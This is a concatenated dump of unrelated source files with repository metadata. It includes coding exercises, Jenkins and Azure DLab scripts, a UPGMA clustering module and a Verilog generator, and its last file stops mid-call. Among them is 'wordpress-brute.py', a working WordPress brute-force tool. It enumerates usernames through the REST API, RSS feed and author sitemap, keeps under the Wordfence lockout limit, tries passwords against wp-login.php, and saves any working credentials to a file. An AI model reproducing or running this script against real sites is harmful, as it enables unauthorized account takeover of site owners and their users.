] | 2 | 2020-06-12T09:54:23.000Z | 2021-05-04T01:34:07.000Z | ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | 961 | 2020-06-23T07:26:22.000Z | 2022-03-31T21:34:52.000Z | ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
def main():
a = input()
# See:
# https://www.slideshare.net/chokudai/abc007
if a == 'a':
print('-1')
else:
print('a')
if __name__ == '__main__':
main()
| 13 | 48 | 0.466063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 93 | 0.420814 |
fc12305fff510e126657094db88dd638e8718e01 | 1,042 | py | Python | part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 2433726b3f164526e8a8fa18739854e052d76a2e | [
"MIT"
] | null | null | null | part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 2433726b3f164526e8a8fa18739854e052d76a2e | [
"MIT"
] | null | null | null | part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 2433726b3f164526e8a8fa18739854e052d76a2e | [
"MIT"
] | null | null | null | import random
from math import sqrt
sum = 0
for x in range(101):
sum += x
print(sum)
'''
range(101) 0-100 一共101个数
range(1,101) 1-100
range(1,101,2) 1-100间的奇数 步长为2
range(100,0,-2) 100-0间的偶数 步长为-2
'''
sum = 0
for x in range(100, 0, -2):
sum += x
print(sum)
# while
# 0-100间的随机数
answer = random.randint(0, 100)
count = 0
while True:
count += 1
number = int(input("Please enter the number: "))
if number < answer:
print("more larger")
elif number > answer:
print("more smaller")
else:
print("right")
print('you got d% times to get right answer' % count)
for i in range(1, 10):
for j in range(1, i + 1):
print('%d*%d=%d' % (i, j, i * j), end='\t')
print()
# 输入一个正整数判断是不是素数
num = int(input('请输入一个正整数: '))
end = int(sqrt(num))
is_prime = True
# 为什么要放一个end 如果这个数有一个小于sqrt的因数
# 就一定会有一个大于sqrt的因数与之对应
for x in range(2, end + 1):
if num % x == 0:
is_prime = False
break
if is_prime and num != 1:
print('%d是素数' % num)
else:
print('%d不是素数' % num)
| 17.366667 | 53 | 0.589251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 522 | 0.428571 |
fc1fa639ebbd112d3143f8455e253cf35ff2e2c9 | 1,033 | py | Python | src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | fd54e8580886084d040d21fa809be8a609d44d8e | [
"MIT"
] | 4 | 2019-06-28T22:46:06.000Z | 2020-05-28T08:53:37.000Z | src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | fd54e8580886084d040d21fa809be8a609d44d8e | [
"MIT"
] | 18 | 2018-09-26T15:32:11.000Z | 2021-10-01T21:57:14.000Z | src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | fd54e8580886084d040d21fa809be8a609d44d8e | [
"MIT"
] | 11 | 2017-03-19T18:37:16.000Z | 2020-04-06T19:46:09.000Z | from __future__ import print_function
import requests
import sys
import os
verbose=True
try:
username=os.environ['USERNAME']
password=os.environ['PASSWORD']
except:
print("Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables")
sys.exit(-1)
jenkins_url=os.environ['JENKINS_URL']
url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)'
print(url)
if username:
crumb = requests.get(url, auth=(username, password))
if crumb.status_code == 200:
crumb_headers = dict()
crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1]
if verbose:
print("Got crumb: %s" % crumb.text)
else:
print("Failed to get crumb")
print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:")
print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm")
print(jenkins_url + "/configureSecurity")
sys.exit(-1)
| 35.62069 | 120 | 0.683446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 428 | 0.414327 |
fc2f8d6fdf5321bc7fa432fe83690f0311e43ce9 | 303 | py | Python | git_operation.py | zerzerzerz/Computer-Virus | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | [
"MIT"
] | null | null | null | git_operation.py | zerzerzerz/Computer-Virus | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | [
"MIT"
] | null | null | null | git_operation.py | zerzerzerz/Computer-Virus | 4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8 | [
"MIT"
] | null | null | null | import os
commit_string = "选择data的前多少个维度参与训练"
not_add = ['results', 'data', 'weights']
for item in os.listdir():
if item in not_add:
# print(item)
continue
else:
os.system(f"git add {item}")
os.system(f'git commit -m "{commit_string}"')
os.system("git push origin main") | 25.25 | 45 | 0.636964 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.471125 |
fc3188873ff10721356aeaf7e965132781c78f98 | 793 | py | Python | level_one/strings.py | jameskzhao/python36 | 855e8a6e164065702efa7773da1f089454fdcbcc | [
"Apache-2.0"
] | null | null | null | level_one/strings.py | jameskzhao/python36 | 855e8a6e164065702efa7773da1f089454fdcbcc | [
"Apache-2.0"
] | null | null | null | level_one/strings.py | jameskzhao/python36 | 855e8a6e164065702efa7773da1f089454fdcbcc | [
"Apache-2.0"
] | null | null | null | #Basics
a = "hello"
a += " I'm a dog"
print(a)
print(len(a))
print(a[1:]) #Output: ello I'm a dog
print(a[:5]) #Output: hello(index 5 is not included)
print(a[2:5])#Output: llo(index 2 is included)
print(a[::2])#Step size
#string is immutable so you can't assign a[1]= b
x = a.upper()
print(x)
x = a.capitalize()
print(x)
x = a.split('e')
print(x)
x = a.split() #splits the string by space
print(x)
x = a.strip() #removes any whitespace from beginning or the end
print(x)
x = a.replace('l','xxx')
print(x)
x = "Insert another string here: {}".format('insert me!')
x = "Item One: {} Item Two: {}".format('dog', 'cat')
print(x)
x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat')
print(x)
#command-line string input
print("Enter your name:")
x = input()
print("Hello: {}".format(x)) | 22.027778 | 63 | 0.631778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 442 | 0.557377 |
fc3d1481782a2c4ff97885d3937f7846223c55ab | 1,082 | py | Python | setup.py | sturmianseq/observed | d99fb99ff2a470a86efb2763685e8e2c021e799f | [
"MIT"
] | 33 | 2015-04-29T08:11:42.000Z | 2022-02-01T16:50:25.000Z | setup.py | sturmianseq/observed | d99fb99ff2a470a86efb2763685e8e2c021e799f | [
"MIT"
] | 15 | 2015-02-04T15:11:17.000Z | 2022-01-26T19:58:29.000Z | setup.py | sturmianseq/observed | d99fb99ff2a470a86efb2763685e8e2c021e799f | [
"MIT"
] | 6 | 2017-06-11T19:40:31.000Z | 2021-08-05T07:57:28.000Z | import re
import setuptools
README_FILENAME = "README.md"
VERSION_FILENAME = "observed.py"
VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]"
# Get version information
with open(VERSION_FILENAME, "r") as version_file:
mo = re.search(VERSION_RE, version_file.read(), re.M)
if mo:
version = mo.group(1)
else:
msg = "Unable to find version string in %s." % (version_file,)
raise RuntimeError(msg)
# Get description information
with open(README_FILENAME, "r") as description_file:
long_description = description_file.read()
setuptools.setup(
name="observed",
version=version,
author="Daniel Sank",
author_email="sank.daniel@gmail.com",
description="Observer pattern for functions and bound methods",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/DanielSank/observed",
py_modules=["observed"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 27.05 | 67 | 0.685767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 433 | 0.400185 |
fc3e56f1b6dc2446fe20c8456364bfd95e849dd0 | 7,538 | py | Python | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | [
"Apache-2.0"
] | null | null | null | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | [
"Apache-2.0"
] | null | null | null | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | DmytroLiaskovskyi/incubator-dlab | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import logging
import json
import sys
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import os
import uuid
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
# generating variables dictionary
print('Generating infrastructure names and tags')
notebook_config = dict()
try:
notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-')
except:
notebook_config['exploratory_name'] = ''
try:
notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-')
except:
notebook_config['computational_name'] = ''
notebook_config['service_base_name'] = os.environ['conf_service_base_name']
notebook_config['resource_group_name'] = os.environ['azure_resource_group_name']
notebook_config['region'] = os.environ['azure_region']
notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-')
notebook_config['project_name'] = os.environ['project_name'].replace('_', '-')
notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-')
notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-')
notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \
'-de-' + notebook_config['exploratory_name'] + '-' + \
notebook_config['computational_name']
notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m'
notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s'
notebook_config['notebook_name'] = os.environ['notebook_instance_name']
notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem'
notebook_config['dlab_ssh_user'] = os.environ['conf_os_user']
notebook_config['instance_count'] = int(os.environ['dataengine_instance_count'])
try:
notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['master_node_name'])
notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['notebook_name'])
except Exception as err:
print('Error: {0}'.format(err))
sys.exit(1)
notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip'])
except Exception as err:
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to generate infrastructure names", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \
" --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\
format(notebook_config['cluster_name'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'],
notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'],
os.environ['azure_datalake_enable'], notebook_config['spark_master_ip'])
try:
local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed installing Dataengine kernels.", str(err))
sys.exit(1)
try:
logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
params = "--hostname {0} " \
"--keyfile {1} " \
"--os_user {2} " \
"--cluster_name {3} " \
.format(notebook_config['notebook_ip'],
notebook_config['key_path'],
notebook_config['dlab_ssh_user'],
notebook_config['cluster_name'])
try:
local("~/scripts/{0}.py {1}".format('common_configure_spark', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to configure Spark.", str(err))
sys.exit(1)
try:
with open("/root/result.json", 'w') as result:
res = {"notebook_name": notebook_config['notebook_name'],
"Action": "Configure notebook server"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
| 51.986207 | 122 | 0.628549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,322 | 0.4407 |
fc412db90075a83ae4e5731ee32b0fb7611791ff | 6,034 | py | Python | src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | [
"BSD-3-Clause"
] | null | null | null | src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | [
"BSD-3-Clause"
] | null | null | null | src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | [
"BSD-3-Clause"
] | null | null | null | # usr/bin/env python
"""Functions to cluster using UPGMA
upgma takes an dictionary of pair tuples mapped to distances as input.
UPGMA_cluster takes an array and a list of PhyloNode objects corresponding
to the array as input. Can also generate this type of input from a DictArray using
inputs_from_dict_array function.
Both return a PhyloNode object of the UPGMA cluster
"""
import numpy
from numpy import argmin, array, average, diag, ma, ravel, sum, take
from cogent3.core.tree import PhyloNode
from cogent3.util.dict_array import DictArray
__author__ = "Catherine Lozupone"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Catherine Lozuopone", "Rob Knight", "Peter Maxwell"]
__license__ = "BSD-3"
__version__ = "2020.7.2a"
__maintainer__ = "Catherine Lozupone"
__email__ = "lozupone@colorado.edu"
__status__ = "Production"
numerictypes = numpy.core.numerictypes.sctype2char
Float = numerictypes(float)
BIG_NUM = 1e305
def upgma(pairwise_distances):
"""Uses the UPGMA algorithm to cluster sequences
pairwise_distances: a dictionary with pair tuples mapped to a distance
returns a PhyloNode object of the UPGMA cluster
"""
darr = DictArray(pairwise_distances)
matrix_a, node_order = inputs_from_dict_array(darr)
tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM)
index = 0
for node in tree.traverse():
if not node.parent:
node.name = "root"
elif not node.name:
node.name = "edge." + str(index)
index += 1
return tree
def find_smallest_index(matrix):
"""returns the index of the smallest element in a numpy array
for UPGMA clustering elements on the diagonal should first be
substituted with a very large number so that they are always
larger than the rest if the values in the array."""
# get the shape of the array as a tuple (e.g. (3,3))
shape = matrix.shape
# turn into a 1 by x array and get the index of the lowest number
matrix1D = ravel(matrix)
lowest_index = argmin(matrix1D)
# convert the lowest_index derived from matrix1D to one for the original
# square matrix and return
row_len = shape[0]
return divmod(lowest_index, row_len)
def condense_matrix(matrix, smallest_index, large_value):
"""converges the rows and columns indicated by smallest_index
Smallest index is returned from find_smallest_index.
For both the rows and columns, the values for the two indices are
averaged. The resulting vector replaces the first index in the array
and the second index is replaced by an array with large numbers so that
it is never chosen again with find_smallest_index.
"""
first_index, second_index = smallest_index
# get the rows and make a new vector that has their average
rows = take(matrix, smallest_index, 0)
new_vector = average(rows, 0)
# replace info in the row and column for first index with new_vector
matrix[first_index] = new_vector
matrix[:, first_index] = new_vector
# replace the info in the row and column for the second index with
# high numbers so that it is ignored
matrix[second_index] = large_value
matrix[:, second_index] = large_value
return matrix
def condense_node_order(matrix, smallest_index, node_order):
"""condenses two nodes in node_order based on smallest_index info
This function is used to create a tree while condensing a matrix
with the condense_matrix function. The smallest_index is retrieved
with find_smallest_index. The first index is replaced with a node object
that combines the two nodes corresponding to the indices in node order.
The second index in smallest_index is replaced with None.
Also sets the branch length of the nodes to 1/2 of the distance between
the nodes in the matrix"""
index1, index2 = smallest_index
node1 = node_order[index1]
node2 = node_order[index2]
# get the distance between the nodes and assign 1/2 the distance to the
# lengthproperty of each node
distance = matrix[index1, index2]
nodes = [node1, node2]
d = distance / 2.0
for n in nodes:
if n.children:
n.length = d - n.children[0].TipLength
else:
n.length = d
n.TipLength = d
# combine the two nodes into a new PhyloNode object
new_node = PhyloNode()
new_node.children.append(node1)
new_node.children.append(node2)
node1.parent = new_node
node2.parent = new_node
# replace the object at index1 with the combined node
node_order[index1] = new_node
# replace the object at index2 with None
node_order[index2] = None
return node_order
def UPGMA_cluster(matrix, node_order, large_number):
"""cluster with UPGMA
matrix is a numpy array.
node_order is a list of PhyloNode objects corresponding to the matrix.
large_number will be assigned to the matrix during the process and
should be much larger than any value already in the matrix.
WARNING: Changes matrix in-place.
WARNING: Expects matrix to already have diagonals assigned to large_number
before this function is called.
"""
num_entries = len(node_order)
tree = None
for i in range(num_entries - 1):
smallest_index = find_smallest_index(matrix)
index1, index2 = smallest_index
# if smallest_index is on the diagonal set the diagonal to large_number
if index1 == index2:
matrix[diag([True] * len(matrix))] = large_number
smallest_index = find_smallest_index(matrix)
row_order = condense_node_order(matrix, smallest_index, node_order)
matrix = condense_matrix(matrix, smallest_index, large_number)
tree = node_order[smallest_index[0]]
return tree
def inputs_from_dict_array(darr):
"""makes inputs for UPGMA_cluster from a DictArray object
"""
darr.array += numpy.eye(darr.shape[0]) * BIG_NUM
nodes = list(map(PhyloNode, darr.keys()))
return darr.array, nodes
| 36.569697 | 82 | 0.716937 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,189 | 0.528505 |
fc416ffd2f7c1bbdb707cd0d27fb98dd3ff367ba | 881 | py | Python | src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0845f1458137cef06d584047bb4287a72c6afbab | [
"Apache-2.0"
] | null | null | null | src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0845f1458137cef06d584047bb4287a72c6afbab | [
"Apache-2.0"
] | null | null | null | src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0845f1458137cef06d584047bb4287a72c6afbab | [
"Apache-2.0"
] | null | null | null | #this code will generate the structural verilog for a single entry in the register file
#takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the
#tristate buffers on the read outputs
#expects the same things as make_store_cell, ensure code is valid there
#Matthew Trahms
#EE 526
#4/20/21
from make_store_cell import make_store_cell
def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num):
#just need to create the correct number of bits
#this and the make_store_array are going to be pretty simple
for bit in range(bits):
make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num)
return
if __name__ == '__main__':
f = open('store_entry_test.txt', 'w')
rows = 4
cols = 2
reads = 2
for row in range(rows):
make_store_entry(f, row, cols, reads, 1, 0)
f.close()
| 31.464286 | 114 | 0.760499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 481 | 0.54597 |
fc46a91fda80741480960994acf3dbc98c9e618b | 8,886 | py | Python | wordpress-brute.py | RandomRobbieBF/wordpress-bf | fe78d4367b7baaf18a4200c5c040595d37b4100f | [
"MIT"
] | 1 | 2020-07-27T11:30:23.000Z | 2020-07-27T11:30:23.000Z | wordpress-brute.py | RandomRobbieBF/wordpress-bf | fe78d4367b7baaf18a4200c5c040595d37b4100f | [
"MIT"
] | null | null | null | wordpress-brute.py | RandomRobbieBF/wordpress-bf | fe78d4367b7baaf18a4200c5c040595d37b4100f | [
"MIT"
] | 1 | 2020-05-17T12:40:13.000Z | 2020-05-17T12:40:13.000Z | #!/usr/bin/env python
#
# Wordpress Bruteforce Tool
#
# By @random_robbie
#
#
import requests
import json
import sys
import argparse
import re
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL")
parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File")
args = parser.parse_args()
url = args.url
passfile = args.file
http_proxy = ""
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
"ftp" : http_proxy
}
# Grab Wordpress Users via Wordpress JSON api
def grab_users_api(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict)
if 'rest_user_cannot_view' in response.text:
print ("[-] REST API Endpoint Requires Permissions [-]")
return False
if response.status_code == 404:
print ("[-] Rest API Endpoint returns 404 Not Found [-]")
return False
elif response.status_code == 200:
jsonstr = json.loads(response.content)
return jsonstr
# Grab Wordpress Users via Sitemap
def grab_users_sitemap(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
return response.text
# Grab Wordpress Users via RSS Feed
def grab_users_rssfeed(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
if "dc:creator" in response.text:
return response.text
# Check we can get to wp-admin login.
def check_wpadmin(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict)
if "Powered by WordPress" in response.text:
if "wp-submit" in response.text:
if "reCAPTCHA" not in response.text:
return True
else:
return False
else:
return False
else:
return False
# Check URL is wordpress
def check_is_wp(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict)
if "wp-content" in response.text:
return True
else:
return False
# Check if wordfence is installed as this limits the logins to 20 per ip
def check_wordfence(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict)
if "Wordfence Security - Firewall & Malware Scan" in response.text:
return True
else:
return False
# Test the logins
def test_login (url,user,password,cnt,attempts):
if str(cnt) == attempts:
print("[-] Stopping as Wordfence will block your IP [-]")
sys.exit(0)
paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"}
headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"wordpress_test_cookie":"WP+Cookie+check"}
response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False)
if response.status_code == 503:
print("[-] Website is giving 503 HTTP Status [-]")
sys.exit(0)
if response.status_code == 502:
print("[-] Website is giving 502 HTTP Status [-]")
sys.exit(0)
if response.status_code == 403:
print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]")
sys.exit(0)
if "Google Authenticator code" in response.text:
print("[-] 2FA is enabled Sorry [-]")
sys.exit(0)
if "wordpress_logged_in" in response.headers['Set-Cookie']:
print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]")
text_file = open("found.txt", "a")
text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n")
text_file.close()
sys.exit(0)
else:
print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]")
cnt += 1
return cnt
def count_pass(passfile):
count = 0
with open(passfile, 'r') as f:
for line in f:
count += 1
f.close()
return str(count)
# Dont no body like dupes.
def remove_dupes():
lines_seen = set()
outfile = open("users.txt", "w")
for line in open("rssusers.txt", "r"):
if line not in lines_seen:
outfile.write(line)
lines_seen.add(line)
outfile.close()
def attack_restapi(url,attempts,userdata,passfile):
for id in userdata:
user = id['slug']
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
def attack_rssfeed(url,attempts,userdata,passfile):
users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata)
if os.path.exists("rssusers.txt"):
os.remove("rssusers.txt")
if os.path.exists("users.txt"):
os.remove("users.txt")
for user in users:
u = user.replace("[CDATA[","")
text_file = open("rssusers.txt", "a")
text_file.write(""+str(u)+"\n")
text_file.close()
remove_dupes()
with open("users.txt", 'r') as f:
for line in f:
user = line.strip()
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as b:
for line in b:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
b.close()
def attack_sitemap(url,attempts,userdata,passfile):
auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata)
for user in auth:
thisuser = user[1]
h = thisuser.split('/')
user = h[4]
cnt = 1
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
# Time For Some Machine Learning Quality IF statements.
def basic_checks(url):
if check_is_wp(url):
if check_wpadmin(url):
return True
else:
return False
else:
return False
if basic_checks(url):
print("[+] Confirmed Wordpress Website [+]")
else:
print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]")
sys.exit(0)
if os.path.isfile(passfile) and os.access(passfile, os.R_OK):
print("[+] Password List Used: "+passfile+" [+]")
else:
print("[-] Either the file is missing or not readable [-]")
sys.exit(0)
# Method Value for which method to enumerate users from
method = "None"
attempts = "None"
# Which method to use for enumeration
if grab_users_api(url):
print("[+] Users found via Rest API [-]")
method = "restapi"
if grab_users_rssfeed(url) and method == "None":
print("[+] Users found via RSS Feed [+]")
method = "rss"
if grab_users_sitemap(url) and method == "None":
print("[+] Users found via Authors Sitemap [-]")
method = "sitemap"
if method == "None":
print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]")
sys.exit(0)
if check_wordfence(url):
print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]")
attempts = "20"
# Kick off Parsing and attacking
if method == "restapi":
userdata = grab_users_api(url)
attack_restapi(url,attempts,userdata,passfile)
if method == "rss":
userdata = grab_users_rssfeed(url)
attack_rssfeed(url,attempts,userdata,passfile)
if method == "sitemap":
userdata = grab_users_sitemap(url)
attack_sitemap(url,attempts,userdata,passfile)
| 31.399293 | 388 | 0.679721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,616 | 0.406932 |
fc519cd073372b79ff5e315d6c117f1de77e8ef5 | 602 | py | Python | examples/bathymetricGradient.py | usgs/water-datapreptools | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | [
"CC0-1.0"
] | 2 | 2021-06-22T18:18:47.000Z | 2021-09-25T18:16:26.000Z | examples/bathymetricGradient.py | usgs/water-datapreptools | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | [
"CC0-1.0"
] | null | null | null | examples/bathymetricGradient.py | usgs/water-datapreptools | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | [
"CC0-1.0"
] | null | null | null | import sys
sys.path.append("..") # change environment to see tools
from make_hydrodem import bathymetricGradient
workspace = r"" # path to geodatabase to use as a workspace
snapGrid = r"" # path to snapping grid
hucPoly = r"" # path to local folder polygon
hydrographyArea = r"" # path to NHD area feature class
hydrographyFlowline = r"" # path to NHD flowline feature class
hydrographyWaterbody = r"" # path to NHD water body feature class
cellsize = '' # cell size
bathymetricGradient(workspace, snapGrid, hucPoly, hydrographyArea,
